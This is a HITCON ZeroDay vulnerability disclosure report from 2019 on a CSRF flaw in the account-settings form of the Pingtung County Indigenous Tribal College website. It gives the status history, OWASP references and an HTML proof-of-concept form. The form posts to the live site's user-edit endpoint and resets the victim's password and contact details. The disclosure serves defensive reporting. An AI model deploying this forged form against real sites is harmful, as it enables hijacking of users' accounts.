Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2019-00587
- Vendor: 屏東縣原住民族部落大學
- Title: 屏東縣原住民族部落大學 CSRF
- Introduction: Cross-Site Request Forgery
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2019/06/22 10:27:38 : 新提交 (由 Noth 更新此狀態)
- 2019/06/23 11:44:49 : 新提交 (由 Noth 更新此狀態)
- 2019/06/23 22:14:19 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2019/07/01 00:18:54 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2019/07/01 00:18:54 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2019/08/22 03:00:05 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2019-00587
- 通報者:Cake7528064 (Noth)
- 風險:低
- 類型:跨站冒名請求 (Cross-Site Request Forgery, CSRF)
參考資料
漏洞說明: OWASP - Cross-Site Request Forgery (CSRF)
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
防禦措施: OWASP - Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
相關網址
敘述
未驗證來自請求的 "域" 是否合法,也沒設置相關token令牌
PoC:
<form action="https://pingtung.tbc.apc.gov.tw/user/?mode=edit" id="frm_user" name="frm_user" method="post" onsubmit="return form_check(frm_user)" enctype="multipart/form-data">
<tr>
<td> <font color="#990000">「*」欄位的資料為必填。</font>
<input type="hidden" name="mode" value="update" /></td>
</tr>
<tr>
<td id="register_title"><h1>帳號設定</h1></td>
</tr>
<tr>
<td><table width="100%" border="0" cellspacing="0" cellpadding="0" class="account_table">
<tr>
<th>帳號 <img src="https://imw8.5.238.ibiz.tw/user/image/marker.png" alt="必填欄位" title="必填欄位" /></th>
<td> test123 </td>
</tr>
<tr>
<th>密碼 <img src="https://imw8.5.238.ibiz.tw/user/image/marker.png" alt="必填欄位" title="必填欄位" /></th>
<td><input type="password" name="password" size="30" value="test123456" />
(限 5~20 個英文字母或數字)</td>
</tr>
<tr>
<th>密碼確認 <img src="https://imw8.5.238.ibiz.tw/user/image/marker.png" alt="必填欄位" title="必填欄位" /></th>
<td><input type="password" name="confirm_pwd" size="30" value="test123456" />
(請再輸入一次密碼)</td>
</tr>
</table></td>
</tr>
<tr>
<td id="register_title"><h1>通訊資料</h1></td>
</tr>
<tr>
<td><table width="100%" border="0" cellspacing="0" cellpadding="0" class="regester_table">
<tr>
<th>姓名 <img src="https://imw8.5.238.ibiz.tw/user/image/marker.png" alt="必填欄位" title="必填欄位" /></th>
<td> test </td>
</tr>
<tr>
<th>性別 <img src="https://imw8.5.238.ibiz.tw/user/image/marker.png" alt="必填欄位" title="必填欄位" /></th>
<td>男</td>
</tr>
<tr>
<th>族別
<img src="https://imw8.5.238.ibiz.tw/user/image/marker.png" alt="必填欄位" title="必填欄位" />
</th>
<td><select name='tribe' class='form_select'><option value=''>請選擇</option><option value='阿美族'>阿美族</option><option value='泰雅族'>泰雅族</option><option value='排灣族'>排灣族</option><option value='布農族'>布農族</option><option value='卑南族'>卑南族</option><option value='魯凱族'>魯凱族</option><option value='鄒族'>鄒族</option><option value='賽夏族'>賽夏族</option><option value='雅美族(達悟族)'>雅美族(達悟族)</option><option value='邵族'>邵族</option><option value='噶瑪蘭族'>噶瑪蘭族</option><option value='太魯閣族'>太魯閣族</option><option value='撒奇萊雅族'>撒奇萊雅族</option><option value='賽德克族'>賽德克族</option><option value='拉阿魯哇族'>拉阿魯哇族</option><option value='卡那卡那富族'>卡那卡那富族</option><option value='漢族'>漢族</option><option value='西拉雅族'>西拉雅族</option></select></td>
</tr>
<tr>
<th>E-mail <img src="https://imw8.5.238.ibiz.tw/user/image/marker.png" alt="必填欄位" title="必填欄位" /></th>
<td><input name="email" type="text" id="email" value="[email protected]" size="63" maxlength="255" /></td>
</tr>
<input type="hidden" name="area" maxlength="255" size="63" value="" />
<input type="hidden" name="zone" maxlength="255" size="63" value="中正區" />
<input type="hidden" name="zip" maxlength="255" size="63" value="" />
<input type="hidden" name="address" maxlength="255" size="63" value="" />
<tr>
<th>聯絡電話 <img src="https://imw8.5.238.ibiz.tw/user/image/marker.png" alt="必填欄位" title="必填欄位" /></th>
<td><input type="text" name="tel_1" maxlength="50" size="63" value="0903470190" /></td>
</tr>
<input type="hidden" name="byear" value="--" />
<input type="hidden" name="bmonth" value="" />
<input type="hidden" name="bday" value="" />
<input type="hidden" name="educational_background" value="" />
<input type="hidden" name="school" value="" />
<input type="hidden" name="career" value="" />
<input type="hidden" name="professional_title" value="" />
<input type="hidden" name="epaper_subscriber" value="0" />
<input type="hidden" name="file_list" value="" />
</table></td>
</tr>
<tr>
<td align="center"><input id="btn_submit" class="form_bottom" type="submit" name="btn_submit" value="確定 / 送出"></td>
</tr>
</form>